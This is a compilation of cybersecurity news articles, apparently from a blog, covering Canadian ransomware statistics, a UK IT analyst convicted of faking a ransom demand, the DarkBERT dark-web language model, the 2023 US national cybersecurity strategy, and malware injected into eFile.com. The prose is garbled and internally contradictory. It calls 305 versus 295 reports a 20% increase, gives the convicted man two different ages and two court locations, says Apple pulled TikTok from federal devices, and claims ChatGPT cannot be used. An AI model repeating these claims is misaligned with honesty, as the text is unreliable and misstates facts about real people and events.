Canadians and Canadian organizations are increasingly falling victim to ransomware attacks. There was an emphasis placed on the urgency of addressing the cyber security issue by Sami Khoury, the president of the Canadian Centre for Cyber Security. The President said that the country has much to do to defend itself from outside threats. 

There used to be many ransomware attacks involving breaking into a system and taking control. However, Khoury notices most attackers have changed their tactics. This report indicates that ransomware attacks in the past had been primarily aimed at hacking into systems and asking for money in exchange for releasing the hacks that had been made. However, these attacks focus on hacking into systems and stealing data and sensitive information from them. This information can be sold on the dark web. The expert says that companies have increased sophistication and backups of their computer systems in case they get attacked or locked out.

This is the reason why attackers seek out information and data to profit financially. According to the report, these types of incidents have become far too common. Khoury estimates that cybercrime is one of the greatest threats to the nation at present. 

According to the Canadian Centre for Cyber Security, there were 305 reports of ransomware attacks reported to them last year as compared to 295 the year before, a 20% increase from 295 the year before. As a result of such incidents becoming so common in recent years, Khoury considers cybercrime to be the number one cyber threat the country faces, including ransomware. 

As a result of ransomware attacks over the last year, many of the biggest brands and organizations in Toronto, such as Suncor Energy Inc., Indigo, and Sobeys have been victimized. Nevertheless, he goes on to say that the actual number is nowhere near the number that has been reported.

The researcher says companies are reluctant to report cybercrime that has impacted their company, and that's the reason why there is a discrepancy between the reported and assumed numbers of cybercrime incidents, as well as the reported numbers of actual incidents. Additionally, he recommended implementing preventative measures such as using strong and unique passwords, enabling multi-factor authentication, and educating employees about these security risks to reduce security risks. 

In light of the escalating geopolitical tensions involving Russia, Ukraine, and China, Khory said that making sure the country is safe from cybersecurity threats is of the utmost importance. It does not mean cyberattacks to stop in the future, however, Khoury insists the nation can still defend itself. 

Cyber attackers are now focused on stealing sensitive data and data used to identify individuals. This is instead of weaseling their way into systems and demanding cash. The information on this website is something that can be threatened to be released or sold by them. 

According to him, these steps are crucial to combating cybercrime today but also attack critical infrastructure in the future. They also combat threats posed by nation-states that threaten Canada and misinformation that ramps across the country. 

A report released last month by the Canadian Communications Security Establishment, part of Koury's center, urged Canadians, after the first anniversary of Russia's invasion of Ukraine in January, "to be vigilant and prepared" for potential malicious activity online. 

A Global Post report in May warned of "abnormal activity" carried out by a state-sponsored perpetrator associated with China. The report warned that the perpetrator was using the inbuilt network administration tools to move through systems. This was to fool the system into thinking any action was a normal activity. 

The government has also observed that, as a result of its parent company's existence in China, where access to user data is permitted by law, the Apple company has pulled the music-based app TikTok from federal devices. He also stressed that if he had to make any recommendations regarding TikTok to the government, he would leave that to them. He did, however, make it clear that the general public also has a part to play in the process. 

Khoury believes citizens should not become pessimistic about the fight against cyber-attackers despite the influx of threats and security concerns catching the public's attention these days, despite the influx of threats. As ransomware attacks surge across the country, a dire cybersecurity crisis is looming in Canada as sensitive data and information are targeted. 

According to Sami Khoury, the need for prompt action is urgent, including accurate reporting, proactive prevention measures, and heightened public awareness to address this issue. For our country's defense against ever-evolving cyber threats, collaboration, resilience, and international cooperation must exist. Even though the digital landscape in Canada has been challenged, Canada remains dedicated to safeguarding and protecting it from cyber-attacks, despite those challenges.

Using Ransomware to Extort Employers by Impersonating a Gang

 


In a court in Fleetwood, Hertfordshire, a 28-year-old United Kingdom man has been found guilty of serving his employer with a forged document and unauthorized access to his computer with criminal intent. 

SEROCU has released a press release explaining the conviction of Ashley Liles, a 29-year-old IT Security Analyst at a company in Oxford that was the victim of a ransomware attack in February 2018. According to the press release, Liles worked as an IT Security Analyst at the time. 

The cybercriminals contacted the company's executive team to demand a ransom payment, the same plan used in many ransomware attacks.

As part of the company's internal investigation efforts and the incident response initiative, Liles, as well as other company members and members of the police, joined the investigation and incident response effort. 

As a result, during this period, it is said that Liles tried to enrich himself from the attack by tricking his employer into paying him a ransom instead of the actual external attacker to enrich himself. 

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

In addition to accessing more than 300 times the private emails of a board member, he also altered the original blackmail email sent by the original attacker and changed the payment information provided by the original attacker. 

A plan had been hatched to take advantage of the situation by diverting the payment from the payment account and sending it to Liles' cryptocurrency wallet. 

In addition to creating an almost identical email address, Lite created another email address that looked almost identical to the original attacker, and sent emails to his employer asking for payment, said SEROCU. 

Although the company owner refused to pay the attackers, a later internal investigation that had been underway at the time revealed that Liles had access to private emails, as evidenced by the IP address of his home, suggesting that he was responsible for the attack. 

By the time SEROCU's cyber-crime team stormed into Liles' home to take his computer, Liles was well aware of the investigation and had wiped all data from his devices. However, restoring incriminating data from Liles' computer was still possible, even though he had realized the investigation was closing in on him. 

During the hearing at Reading Crown Court, Liles pleaded guilty five years after he first denied any involvement in the case and pleaded guilty a second time. There is going to be a court date for this rogue employee on July 11th, 2023, he will be sentenced at that time.

Accusing someone of hacking into a computer without their permission is punishable by up to two years in prison in the UK, while blackmail is punishable by up to 14 years in prison.

Hackers and Cybercriminals Use Dark Web Data to Train DarkBert AI

 


There is a paper released by a team of South Korean researchers describing how they developed a machine-learning model from a large dark web corpus collected by crawling Tor's network. It was obvious that there were many shady sites included in the data. These sites were from the crypto community, pornography, hackers, weapons, and other categories. Despite this, the team decided not to use the data in the manner it came due to ethical concerns. 

DarkBERT was trained with a pre-training corpus, which was polished through filtering before feeding to the model through dark learning so that sensitive data would not be included in training since bad actors could extract sensitive data from it.

Some think that DarkBERT would sound like a nightmare, but the researchers say that it is a promising project that will do more than help combat cybercrime; it will also contribute to the advancement of technology in the field, which has grown a lot through natural language processing.

The team used the Tor network to connect their model to the dark web by using the DarkBERT language model. This system allows access to the dark web without logging in. In the process, it created a raw database of the data it found and then put it into a search engine. 

There has been a recent explosion of large language models available in the marketplace, and more are appearing with each passing day. It is well known that most of the linguistic giants, such as OpenAI's ChatGPT and Google's Bard, are trained by examining text data from all over the internet including websites, articles, books, you name it   they train their new algorithms using that data. As such, their output consists of various geniuses that overlap. 

The researchers published a paper about their findings in the journal "DarkBERT: A Language Model for the Dark Side of the Internet." Using the Tor network as a launching point for their model, they collected raw data and created a database using the raw data collected. 

As of yet, no peer review has been conducted on this paper. DarkBERT is named after the LLM based on the Roberta architecture, which is where DarkBERT originated. Developed by Facebook researchers in 2019, this is an empirical model based on converters. 

The General Language Understanding Evaluation (GLUE) NLP benchmark produced state-of-the-art results due to Facebook's optimization method, as it is a benchmark that tests the general language understanding capabilities of NLP systems. 

Meta described Roberta as an "outstanding algorithm for pretraining natural language processing (NLP) systems that are robustly optimized", an improvement upon BERT, which Google released in 2018 for NLP pretraining. LLM was made open-source by Google, which led Meta to improve its performance. 

It has now been demonstrated that the South Korean researchers behind DarkBERT can accomplish even more because Roberta was released with inadequate training. Over 16 days, the researchers supplied Roberta with raw data from the dark web. They preprocessed data from the dark web and obtained DarkBERT from that information. 

They improved their original model by feeding Korean researchers dark web data over 15 days. This resulted in DarkBERT, an advanced research model. A top-level machine consisting of four NVIDIA A110 80GB GPUs and an Intel Xeon Gold 6348 CPU is included in the research paper as it is revealed that this machine was used to conduct the study.

How does DarkBERT work?


While DarkBERT's name may imply the opposite, DarkBERT is a system designed to protect and enforce the law. It is not intended to be used for evil purposes. 

Often, hackers and ransomware groups upload sensitive data to the dark web in hopes of selling it to other parties for profit. DarkBERT has been shown in a research paper to be useful to security researchers when it comes to automatically identifying such websites using automatic algorithms. In addition to crawling through the dark web forums, it can also be used to monitor any exchanges of illegal information that may be taking place on these forums. 

The public cannot access DarkBERT. DarkBERT was trained on sensitive data  but was not allowed to be released in its preprocessed form, which the researchers say is planned. However, they did not specify a date for when will it happen. 

It does not matter whether DarkBERT represents an artificial intelligence future where AI models are taught from targeted data so that they can be tailored to targeted tasks. As opposed to ChatGPT and Google Bard, both of which can perform multiple functions, DarkBERT is a weapon specifically designed for thwarting hackers and one that can be used by anyone. 

Even though there are numerous artificial intelligence chatbots out there, you need to be careful when using them. You may get a malware infection from fake ChatGPT applications or even risk exposing sensitive data like Samsung employees did recently. 

This is because when using these popular AI chatbots, you want to be sure you are getting to the right website, not just a random one. The software companies OpenAI, Microsoft, and Google have yet to release official apps for AI chatbots. This means you cannot use ChatGPT, Bing Chat, and Google Bard.

White House Cybersecurity Strategy warns of "Complex Threat Environment"

 


There was a national cyber-security strategy published by the White House on March 2. It contains a list of threats to U.S. networks terrestrially and in space related to Russian and Chinese hackers. 

"Evolving intelligence" suggests many options could be explored for potential cyberattacks against critical U.S. infrastructure, as President Biden warned on Monday. 

Anne Neuberger, Mr. Biden's deputy national security adviser for cyber and emerging technology, told reporters Monday afternoon that U.S. officials have observed "preparatory work" linked to nation-state actors, despite no evidence of any specific cyberattack threat. The fact that U.S. companies are scanning their websites and hunting for vulnerabilities may indicate an increase in vulnerability-hunting activities. 

On Thursday, the Biden administration released its nationally comprehensive cybersecurity strategy. This provides the steps required to ensure the nation's cyber ecosystem is protected from threats. 

A few key pillars will be emphasized in the strategy as it moves forward. In addition to cyberattacks, these efforts include disrupting and dismantling cyber criminals, establishing international partnerships, and protecting critical infrastructure from cyberattacks. 

The White House will still need to implement Space Policy Directive 5. This was issued by the previous administration in September 2020 and focuses on space systems protection. Although the updated document replaces the Trump administration's 2018 cybersecurity strategy, the White House will continue to implement that strategy. 

It was stated in the strategy that the first pillar will enhance cybersecurity requirements for critical sectors. This will secure critical infrastructure. Public-private partnerships and federal network modernization will also be formed to keep up with cyber security threats. 

It has been interesting to see bipartisan support for several cyber bills that Congress introduced and passed last year aimed at protecting critical infrastructure. These include critical infrastructure in the health and energy sectors. 

Moreover, Kemba Walden suggested that the government should utilize all resources at its disposal, including the military and law enforcement authorities. This will disrupt malicious cyber activity and pursue perpetrators. 

Walden assumed the role of acting director after Chris Inglis resigned due to health reasons. Biden named Inglis as the first director of cyber security for the nation in 2021 following a nomination by Biden. Inglis announced his resignation in mid-February.  

There is a second pillar of the strategy that focuses on disrupting and dismantling cyber criminals, such as nation-state threats.

To protect the country's national security and public safety, the government uses every available resource to "make it harder for them to pose a threat to national security." 

Increasing collaboration and partnership with foreign partners who share the same mission is the third pillar of the strategy. The administration announced today that to counter cyberattacks it will use international coalitions among "like-minded nations." 

SPD 5 was touted as a first step toward developing an accurate and comprehensive security policy for satellites and systems that connect them to the Internet. 

The role that space systems play as vital infrastructure, as well as providers of essential services, has caused experts to warn that a growing number of attacks are being launched against them. 

A major thrust of the National Cybersecurity Strategy is the realignment of incentives so that long-term investments are prioritized. It has been suggested in recent years that the biggest, most capable, and best-positioned actors in the digital ecosystem - whether in the public or private sectors - can and should take on an increased share of the burden to mitigate cyber risk in their respective industries. Public and private sector entities must have the resources, capabilities, and incentives to choose long-term solutions over temporary fixes when faced with trade-offs between short-term fixes and long-term solutions. 

In addition, the United States remains committed to international cyber partnerships. Defendable, resilient, and value-aligned digital ecosystems will be built with allies and partners. Keeping shared interests at the forefront means promoting an environment where all states are expected to behave responsibly in global cyberspace. On the other hand, a person who displays irresponsible behavior is not only a source of cost but also isolation.

A path is outlined in this strategy to ensure our digital future is secure. By implementing it, the administration will lay the foundation for reliable cyberinfrastructure. This will enable it to achieve its infrastructure, clean energy, equity, democracy, and economic opportunity goals. At the most fundamental level, it acknowledges that cyberspace exists not for its own sake but only to be used in pursuit of our highest goals.   

eFile.com Hosted Malware on its Website

 


Malicious code was injected into eFile.com's server, an online service that assists people with filing tax returns. This resulted in malware being delivered to users' computers. 

It was discovered that the software service, which is authorized by the Internal Revenue Service (IRS), despite not being operated by its agent, was serving malware for several weeks before it was cleaned up earlier this week. 

This is the official IRS format for filing tax documents online - or electronically - and usually without printing any documents. The IRS recommends this format for all federal tax filings. Even though external services can pose additional security risks, citizens can use software programs or websites to submit their tax returns.

US citizens' tax-filing deadline on April 18th is getting closer and closer. Cyber-criminals are exploiting the deadline to increase their malicious campaigns against tax-filing services and users to gain access to their private information. In recent weeks, the eFile.com online platform has become one of the most popular sites for filing tax returns. As such, it has again become a victim of tax-related cybercrime. 

The security incident particularly affects eFile.com and not IRS' e-file infrastructure or domains with the same sounding name or similar sounding domains. 

There is also additional JS code loaded from about amanewonliag dot online in addition to the base64 encoded script. If the user chooses to run the malware advertisement, they will be asked to download an executable file named "update.exe" or "installer.exe" depending on the browser they are using. 

Upon further inspection, researchers found a PHP backdoor in the executable binaries. Backdoors of this kind are designed to connect with IP addresses located in Tokyo, such as 47.245.6.91 hosted by Alibaba Corporation. Similarly, when the malicious script popper.js pinged the infoamanewonliag domain, the same IP address hosted the infoamanewonliag domain. 

In mid-March, a Reddit user initially reported that the eFile.com website had been compromised, with visitors being redirected to a fake 'network error' page as well as with a false browser update being served to them. 

If the user clicks on the link for a browser update, they will be served either the update.exe file or the installer.exe file, depending on the operating system. In a recent research paper published by the SANS Internet Storm Center, Johannes Ullrich pointed out that malicious files were being detected far less frequently than healthy files on VirusTotal. 

Furthermore, he discovered that 'update.exe' was signed with a valid certificate emanating from a company named Sichuan Niurui Science and Technology Co., Ltd.

In a follow-up post, Ullrich explains that the analysis of update.exe shows it to be a Python downloader, which fetches a PHP script, that establishes communication with the command-and-control server, which is further used to send messages to the attacker. 

Considering the analysis of a sample of the PHP script’s that was seen by MalwareHunterTeam, it was determined to be a backdoor malware. Threat actors can then access the device remotely through this method, allowing them to take control of it remotely. 

PHP scripts are installed in the background during malware distribution. 

The malware continually engages a remote command and control server that is controlled by threat actors every ten seconds to communicate with them. As soon as the malware receives a task to run on the device that is infected, it will begin working on it. 

As a backdoor, the eFile backdoor offered the very basics of what malicious software would provide, but it was still dangerous enough to give cybercriminals full access to a Windows PC with the backdoor, giving them the leverage to attack other systems on a corporate network. 

The company eFile.com is yet to explain what happened. LockBit ransomware has been linked to a cyber gang named OLOC that claims to have already attacked the website in January 2022. 

According to the researcher, this malicious JavaScript code was also removed by eFile from the website on the 3rd of April. The attackers tried to eliminate the infection themselves before the incident, probably to cover up their tracks after the infection had been removed. There is apparent malicious code that has been injected into every page on eFile.com as a part of the malware attack.